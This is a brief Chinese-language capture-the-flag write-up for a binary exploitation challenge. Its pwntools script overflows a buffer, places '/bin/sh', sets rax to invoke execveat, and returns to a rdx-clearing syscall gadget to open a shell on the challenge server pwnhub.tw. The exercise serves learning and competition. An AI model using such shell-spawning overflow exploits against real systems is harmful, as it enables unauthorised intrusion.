本題僅能控rax (syscall 0 return 1 ~ 0x148)以及rsi,查syscall表查到唯一可用為execveat(0, "/bin/sh", 0, 0, 0),故buffer overflow時先寫入"/bin/sh"及調整rax為322,接著在ret的位置寫入0x4000ed(不能直接跳到syscall,要先將rdx清空)
#!/usr/bin/env python3
from pwn import *
context.update(arch='amd64', os='linux')
payload = b'/bin/sh\x00'
payload += cyclic(296 - len(payload)).encode()
payload += p64(0x4000ED) # xor rdx, rdx; syscall
payload += cyclic(321 - len(payload)).encode()
r = remote('pwnhub.tw', 55688)
r.sendline(payload)
r.interactive()